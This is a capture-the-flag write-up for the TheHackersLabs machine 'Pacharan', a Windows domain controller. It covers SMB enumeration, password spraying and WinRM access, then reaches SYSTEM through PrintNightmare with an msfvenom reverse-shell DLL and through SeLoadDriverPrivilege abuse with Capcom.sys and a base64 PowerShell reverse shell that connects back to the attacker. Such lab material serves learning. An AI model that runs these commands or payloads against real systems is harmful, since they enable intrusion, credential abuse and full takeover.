Pacharan – TheHackersLabs Link to heading
- OS: Linux
- Difficulty: Easy
- Platform: TheHackersLabs
Summary Link to heading
“Pacharan” is an easy machine from TheHackersLabs platform. An anonymous login through SMB service leakes information about potential passwords and users in this machine. This allows us to enter in the victim machine with a user containing SeLoadDriverPrivilege enabled. We can then use this privilege to escalate privileges and own the system.
User Link to heading
Nmap scan shows multiple ports open: 53 DNS, 88 Kerberos, 135 Microsoft RPC, 389 LDAP, 445 SMB, 5985 WinRM; among many others:
❯ sudo nmap -sVC -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49666,49668,49669,49670,49671,49672,49675,49681,49688 192.168.69.69 -oN targeted
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-17 05:56 -03
Nmap scan report for 192.168.69.69
Host is up (0.00025s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-17 03:57:17Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PACHARAN.THL, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PACHARAN.THL, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49671/tcp open msrpc Microsoft Windows RPC
49672/tcp open msrpc Microsoft Windows RPC
49675/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49688/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:F9:EA:71 (Oracle VirtualBox virtual NIC)
Service Info: Host: WIN-VRU3GG3DPLJ; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-09-17T03:58:11
|_ start_date: 2024-09-17T03:46:38
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: -5h00m01s
|_nbstat: NetBIOS name: WIN-VRU3GG3DPLJ, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:f9:ea:71 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 89.14 seconds
To get info against this target, we run enum4linux-ng. If we attempt to get info with session guest, we get:
❯ python3 /home/gunzf0x/GitStuff/enum4linux-ng/enum4linux-ng.py 192.168.69.69 -u 'guest' -p ''
ENUM4LINUX - next generation
==========================
| Target Information |
==========================
[*] Target ........... 192.168.69.69
[*] Username ......... 'guest'
[*] Random Username .. 'zgjzuauv'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)
=====================================
| Service Scan on 192.168.69.69 |
=====================================
[*] Checking LDAP
[+] LDAP is accessible on 389/tcp
[*] Checking LDAPS
[+] LDAPS is accessible on 636/tcp
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp
=====================================================
| Domain Information via LDAP for 192.168.69.69 |
=====================================================
[*] Trying LDAP
[+] Appears to be root/parent DC
[+] Long domain name is: PACHARAN.THL
<SNIP>
============================================================
| Domain Information via SMB session for 192.168.69.69 |
============================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: WIN-VRU3GG3DPLJ
NetBIOS domain name: PACHARAN
DNS domain: PACHARAN.THL
FQDN: WIN-VRU3GG3DPLJ.PACHARAN.THL
Derived membership: domain member
Derived domain: PACHARAN
<SNIP>
=======================================
| Shares via RPC on 192.168.69.69 |
=======================================
[*] Enumerating shares
[+] Found 10 share(s):
ADMIN$:
comment: Admin remota
type: Disk
C$:
comment: Recurso predeterminado
type: Disk
IPC$:
comment: IPC remota
type: IPC
NETLOGON:
comment: "Recurso compartido del servidor de inicio de sesi\xF3n"
type: Disk
NETLOGON2:
comment: ''
type: Disk
PACHARAN:
comment: ''
type: Disk
PDF Pro Virtual Printer:
comment: Soy Hacker y arreglo impresoras
type: Printer
SYSVOL:
comment: "Recurso compartido del servidor de inicio de sesi\xF3n"
type: Disk
Users:
comment: ''
type: Disk
print$:
comment: Controladores de impresora
type: Disk
[*] Testing share ADMIN$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share C$
[+] Mapping: DENIED, Listing: N/A
[*] Testing share IPC$
[+] Mapping: OK, Listing: NOT SUPPORTED
[*] Testing share NETLOGON
[+] Mapping: OK, Listing: DENIED
[*] Testing share NETLOGON2
[+] Mapping: OK, Listing: OK
[*] Testing share PACHARAN
[+] Mapping: OK, Listing: DENIED
[*] Testing share PDF Pro Virtual Printer
[-] Could not check share: STATUS_OBJECT_NAME_NOT_FOUND
[*] Testing share SYSVOL
[+] Mapping: OK, Listing: DENIED
[*] Testing share Users
[+] Mapping: OK, Listing: DENIED
[*] Testing share print$
[+] Mapping: OK, Listing: DENIED
<SNIP>
If we check what shares we have as guest user with NetExec we get:
❯ netexec smb 192.168.69.69 -u 'guest' -p '' --shares
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL) (signing:True) (SMBv1:False)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\guest:
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [*] Enumerated shares
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ Share Permissions Remark
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ ----- ----------- ------
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ ADMIN$ Admin remota
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ C$ Recurso predeterminado
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ IPC$ READ IPC remota
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ NETLOGON Recurso compartido del servidor de inicio de sesión
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ NETLOGON2 READ
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PACHARAN
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PDF Pro Virtual Printer Soy Hacker y arreglo impresoras
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ print$ Controladores de impresora
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ SYSVOL Recurso compartido del servidor de inicio de sesión
Here, NETLOGON2 is not a usual share.
If we check this shared resource with smbclient, we can see:
❯ smbclient -U guest% //192.168.69.69/NETLOGON2
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jul 31 13:25:34 2024
.. D 0 Wed Jul 31 13:25:34 2024
Orujo.txt A 22 Wed Jul 31 13:25:55 2024
7735807 blocks of size 4096. 4721853 blocks available
smb: \> get Orujo.txt
getting file \Orujo.txt of size 22 as Orujo.txt (7.2 KiloBytes/sec) (average 7.2 KiloBytes/sec)
Where we were able to get a file called Orujo.txt.
Reading its content returns:
❯ cat Orujo.txt
Pericodelospalotes6969
Since Orujo seems like a user and Pericodelospalotes6969 seems like a password, we can check if these credentials are valid in SMB service with NetExec:
❯ netexec smb 192.168.69.69 -u 'orujo' -p 'Pericodelospalotes6969'
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL) (signing:True) (SMBv1:False)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\orujo:Pericodelospalotes6969
We can then check if we have new shared resources that we are allowed to read:
❯ netexec smb 192.168.69.69 -u 'orujo' -p 'Pericodelospalotes6969' --shares --filter-shares READ
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL) (signing:True) (SMBv1:False)
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\orujo:Pericodelospalotes6969
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [*] Enumerated shares
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ Share Permissions Remark
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ ----- ----------- ------
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ IPC$ READ IPC remota
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ NETLOGON READ Recurso compartido del servidor de inicio de sesión
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ PACHARAN READ
We can now read PACHARAN shared resource.
Using smbmap in this new shared resource, shows a new file:
❯ smbmap -H 192.168.69.69 -u 'orujo' -p 'Pericodelospalotes6969' -r 'PACHARAN' --no-banner
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] IP: 192.168.69.69:445 Name: 192.168.69.69 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Admin remota
C$ NO ACCESS Recurso predeterminado
IPC$ READ ONLY IPC remota
NETLOGON READ ONLY Recurso compartido del servidor de inicio de sesión
NETLOGON2 NO ACCESS
PACHARAN READ ONLY
./PACHARAN
dr--r--r-- 0 Wed Jul 31 13:21:13 2024 .
dr--r--r-- 0 Wed Jul 31 13:21:13 2024 ..
fr--r--r-- 921 Wed Jul 31 13:21:13 2024 ah.txt
PDF Pro Virtual Printer NO ACCESS Soy Hacker y arreglo impresoras
print$ NO ACCESS Controladores de impresora
SYSVOL NO ACCESS Recurso compartido del servidor de inicio de sesión
Users NO ACCESS
[*] Closed 1 connections
We download this new file:
❯ smbmap -H 192.168.69.69 -u 'orujo' -p 'Pericodelospalotes6969' --download 'PACHARAN/ah.txt' --no-banner
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB connections(s) and 1 authenticated session(s)
[+] Starting download: PACHARAN\ah.txt (921 bytes)
[+] File output to: /home/gunzf0x/OtherMachines/TheHackersLabs/Pacharan/nmap/192.168.69.69-PACHARAN_ah.txt
[*] Closed 1 connections
If we read this file, we have what might be potential passwords:
❯ cat 192.168.69.69-PACHARAN_ah.txt
Mamasoystreamer1!
Mamasoystreamer2@
Mamasoystreamer3#
Mamasoystreamer4$
Mamasoystreamer5%
Mamasoystreamer6^
Mamasoystreamer7&
<SNIP>
MamasoyStr5amer%
MamasoyStr6amer^
MamasoyStr7amer&
MamasoyStr8amer*
MamasoyStr9amer(
MamasoyStr10amer)
Mamasoystreamer1
We can then use Microsoft RPC along with rpcclient enumerate users in the system:
❯ rpcclient -U "Whisky%MamasoyStream2er@" 192.168.69.69 -c 'enumdomusers' | grep -o '\[.*\]' | sed 's/\[//;s/\]//' | awk -F 'rid' '{print $1}'
Administrador
Invitado
krbtgt
DefaultAccount
Orujo
Ginebra
Whisky
Hendrick
Chivas Regal
Whisky2
JB
Chivas
beefeater
CarlosV
RedLabel
Gordons
We can then attempt a Password Spray with the potential password list against these users. First, use rpcclient output to generate a list of potential users:
❯ rpcclient -U "Whisky%MamasoyStream2er@" 192.168.69.69 -c 'enumdomusers' | grep -o '\[.*\]' | sed 's/\[//;s/\]//' | awk -F 'rid' '{print $1}' > potential_users.txt
Then, do a Password Spray against these users using the passwords found using NetExec:
❯ netexec smb 192.168.69.69 -u potential_users.txt -p ah.txt --continue-on-success | grep '\[+\]'
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Whisky:MamasoyStream2er@
and we get credentials: Whisky:MamasoyStream2er@.
We remember from the first scan to SMB shares, that there was a printer message. We can check if we have something in Microsoft RPC service using rpcclient:
❯ rpcclient -U "Whisky%MamasoyStream2er@" 192.168.69.69 -c 'enumprinters'
flags:[0x800000]
name:[\\192.168.69.69\Soy Hacker y arreglo impresoras]
description:[\\192.168.69.69\Soy Hacker y arreglo impresoras,Universal Document Converter,TurkisArrusPuchuchuSiu1]
comment:[Soy Hacker y arreglo impresoras]
We then check if one of our users is valid:
❯ netexec smb 192.168.69.69 -u potential_users.txt -p 'TurkisArrusPuchuchuSiu1' | grep '\[+\]'
SMB 192.168.69.69 445 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Chivas Regal:TurkisArrusPuchuchuSiu1
and we get credentials: Chivas Regal:TurkisArrusPuchuchuSiu1.
We can check if this user is allowed to log in via WinRM:
❯ netexec winrm 192.168.69.69 -u 'Chivas Regal' -p 'TurkisArrusPuchuchuSiu1'
WINRM 192.168.69.69 5985 WIN-VRU3GG3DPLJ [*] Windows 10 / Server 2016 Build 14393 (name:WIN-VRU3GG3DPLJ) (domain:PACHARAN.THL)
WINRM 192.168.69.69 5985 WIN-VRU3GG3DPLJ [+] PACHARAN.THL\Chivas Regal:TurkisArrusPuchuchuSiu1 (Pwn3d!)
and we can.
We can finally connect as this user with evil-winrm:
❯ evil-winrm -i 192.168.69.69 -u 'Chivas Regal' -p 'TurkisArrusPuchuchuSiu1'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents>
and read the user flag at this user’s Desktop.
NT Authority/System - Administrator Link to heading
We find 2 ways to pwn the system.
Privesc #1: Use PrintNightmare
Link to heading
We can check if this system might be vulnerable to CVE-2021-34527, a.k.a., PrintNightmare. For this, we can run:
❯ impacket-rpcdump @192.168.69.69 | grep -E 'MS-RPRN|MS-PAR'
Protocol: [MS-RPRN]: Print System Remote Protocol
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
MS-PAR. and MS-RPRN protocols are enabled. This is a good sign.
We can then use this Powershell module for PrintNightmare. Then, upload it to the system with upload function from evil-winrm:
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> upload CVE-2021-34527.ps1 .\printNightmare.ps1
Info: Uploading /home/gunzf0x/OtherMachines/TheHackersLabs/Pacharan/exploits/CVE-2021-34527.ps1 to C:\Users\Chivas Regal\Documents\.\printNightmare.ps1
Data: 238084 bytes of 238084 bytes copied
Info: Upload successful!
and import it:
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> Import-Module .\printNightmare.ps1
Once uploaded and imported, I attempt to create a user running:
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> Invoke-Nightmare -DriverName "Xerox" -NewUser "gunzf0x" -NewPassword "gunzf0x123$!"
[+] created payload at C:\Users\Chivas Regal\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\mxdwdrv.dll"
[+] added user gunzf0x as local administrator
[+] deleting payload from C:\Users\Chivas Regal\AppData\Local\Temp\nightmare.dll
Even if the output says it was created, if I check users in the system my user is not there:
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> net user
Cuentas de usuario de \\
-------------------------------------------------------------------------------
Administrador beefeater CarlosV
Chivas Chivas Regal DefaultAccount
Ginebra Gordons Hendrick
Invitado JB krbtgt
Orujo RedLabel Whisky
Whisky2
El comando se ha completado con uno o m s errores.
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> net localgroup administradores
Nombre de alias administradores
Comentario Los administradores tienen acceso completo y sin restricciones al equipo o dominio
Miembros
-------------------------------------------------------------------------------
Administrador
Administradores de empresas
Admins. del dominio
Se ha completado el comando correctamente.
I then attempt to run it with the “defualt” option. But, again, the output says it worked, but the user is not created:
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> Invoke-Nightmare
[+] using default new user: adm1n
[+] using default new password: P@ssw0rd
[+] created payload at C:\Users\Chivas Regal\AppData\Local\Temp\nightmare.dll
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\mxdwdrv.dll"
[+] added user as local administrator
[+] deleting payload from C:\Users\Chivas Regal\AppData\Local\Temp\nightmare.dll
I think this problem might be due to the machine being in spanish (changing the group administrators to administradores).
Reading the Github repository for the script also provides a flag -DLL to execute a .dll file. For this reason, I create a malicious .dll file with msfvenom in my attacker machine:
❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.69.2 LPORT=443 -f dll -o rev.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of dll file: 9216 bytes
Saved as: rev.dll
where 192.168.69.2 is my attacker IP address and 443 is the port I will start listening with netcat.
Again, we upload it to the target machine using upload function from evil-winrm:
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> upload rev.dll
Info: Uploading /home/gunzf0x/OtherMachines/TheHackersLabs/Pacharan/exploits/rev.dll to C:\Users\Chivas Regal\Documents\rev.dll
Data: 12288 bytes of 12288 bytes copied
Info: Upload successful!
Since the space in Chivas Regal username can cause a conflict in the absolute path, I will copy this file to another directory. Based on AppLockerBypasses page, I will select the path:
C:\Windows\System32\spool\drivers\color
that should not have permission problems to write files there.
We then copy the malicious .dll file there with evil-winrm session:
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> copy rev.dll C:\Windows\System32\spool\drivers\color\rev.dll
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> dir C:\Windows\System32\spool\drivers\color
Directorio: C:\Windows\System32\spool\drivers\color
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/16/2016 3:18 PM 1058 D50.camp
-a---- 7/16/2016 3:18 PM 1079 D65.camp
-a---- 7/16/2016 3:18 PM 797 Graphics.gmmp
-a---- 7/16/2016 3:18 PM 838 MediaSim.gmmp
-a---- 7/16/2016 3:18 PM 786 Photo.gmmp
-a---- 7/16/2016 3:18 PM 822 Proofing.gmmp
-a---- 9/17/2024 7:13 AM 9216 rev.dll
-a---- 7/16/2016 3:18 PM 218103 RSWOP.icm
-a---- 7/16/2016 3:18 PM 3144 sRGB Color Space Profile.icm
-a---- 7/16/2016 3:18 PM 17155 wscRGB.cdmp
-a---- 7/16/2016 3:18 PM 1578 wsRGB.cdmp
I will then start a listener with netcat on port 443 in my attacker machine:
❯ nc -lvnp 443
listening on [any] 443 ...
In the victim machine, I execute the malicious .dll file using -DLL flag along with Invoke-Nightmare malicious module:
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> Invoke-Nightmare -DLL 'C:\Windows\System32\spool\drivers\color\rev.dll'
[+] using user-supplied payload at C:\Windows\System32\spool\drivers\color\rev.dll
[!] ignoring NewUser and NewPassword arguments
[+] using pDriverPath = "C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_7b3eed059f4c3e41\Amd64\mxdwdrv.dll"
[!] AddPrinterDriverEx failed
At line:1 char:1
+ Invoke-Nightmare -DLL 'C:\Windows\System32\spool\drivers\color\rev.dl ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [Write-Error], WriteErrorException
+ FullyQualifiedErrorId : Microsoft.PowerShell.Commands.WriteErrorException,Invoke-Nightmare
it returned an error. However, in my netcat listener, I get:
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.69.2] from (UNKNOWN) [192.168.69.69] 58002
Microsoft Windows [Versin 10.0.14393]
(c) 2016 Microsoft Corporation. Todos los derechos reservados.
C:\Windows\system32>whoami
whoami
nt authority\system
we are nt authority/system. GG.
Privesc #2: Use SeLoadDriverPrivilege privilege
Link to heading
If we check what are the privileges of Chivas Regal user, we get:
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> whoami /priv
INFORMACIàN DE PRIVILEGIOS
--------------------------
Nombre de privilegio Descripci¢n Estado
============================= =============================================== ==========
SeMachineAccountPrivilege Agregar estaciones de trabajo al dominio Habilitada
SeLoadDriverPrivilege Cargar y descargar controladores de dispositivo Habilitada
SeChangeNotifyPrivilege Omitir comprobaci¢n de recorrido Habilitada
SeIncreaseWorkingSetPrivilege Aumentar el espacio de trabajo de un proceso Habilitada
We can see the SeLoadDriverPrivilege privilege enabled.
We can use this repository that provides all the necessary files to exploit this privilege. We can clone this repository in our attacker machine. Then, pass the files using, again, evil-winrm:
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> upload Capcom.sys C:\Windows\System32\spool\drivers\color\Capcom.sys
Info: Uploading /home/gunzf0x/HTB/HTBMachines/Medium/Fuse/exploits/SeLoadDriverPrivilege/Capcom.sys to C:\Windows\System32\spool\drivers\color\Capcom.sys
Data: 14100 bytes of 14100 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> upload ExploitCapcom.exe C:\Windows\System32\spool\drivers\color\ExploitCapcom.exe
Info: Uploading /home/gunzf0x/HTB/HTBMachines/Medium/Fuse/exploits/SeLoadDriverPrivilege/ExploitCapcom.exe to C:\Windows\System32\spool\drivers\color\ExploitCapcom.exe
Data: 387752 bytes of 387752 bytes copied
Info: Upload successful!
Then, load the .sys file using LOAD command:
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> C:\Windows\System32\spool\drivers\color\ExploitCapcom.exe LOAD C:\Windows\System32\spool\drivers\color\Capcom.sys
[*] Service Name: aabvavbo
[+] Enabling SeLoadDriverPrivilege
[+] SeLoadDriverPrivilege Enabled
[+] Loading Driver: \Registry\User\S-1-5-21-3046175042-3013395696-775018414-1108\?????????????????
NTSTATUS: 00000000, WinError: 0
and check if this has worked, testing with whoami command with EXPLOIT module:
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> C:\Windows\System32\spool\drivers\color\ExploitCapcom.exe EXPLOIT whoami
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 00000216F7BE0008
[+] Shellcode was executed
[+] Token stealing was successful
[+] Command Executed
nt authority\system
the command is being executed, and the output is nt authority/system. Therefore, we are executing commands as this user.
Finally, we can go to Reverse Shell Generator page (https://www.revshells.com/), search for PowerShell #3 (Base64) payload, put our attacker IP address and listening port with netcat (that in my cases are 192.168.69.2 and 443, respectively), and generate a payload. Before executing the payload, start a netcat listener in our attacker machine:
❯ nc -lvnp 443
listening on [any] 443 ...
and, finally, execute the payload abusing ExploitCapcom.exe in the victim machine:
*Evil-WinRM* PS C:\Users\Chivas Regal\Documents> C:\Windows\System32\spool\drivers\color\ExploitCapcom.exe EXPLOIT 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADYAOQAuADIAIgAsADQANAAzACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=='
[*] Capcom.sys exploit
[*] Capcom.sys handle was obtained as 0000000000000064
[*] Shellcode was placed at 0000026321830008
[+] Shellcode was executed
[+] Token stealing was successful
[+] Command Executed
and we get a shell as nt authority/system in our listener:
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.69.2] from (UNKNOWN) [192.168.69.69] 58090
whoami
nt authority\system
PS C:\Users\Chivas Regal\Documents>
We can finally read the root flag at Administrador desktop.
~Happy Hacking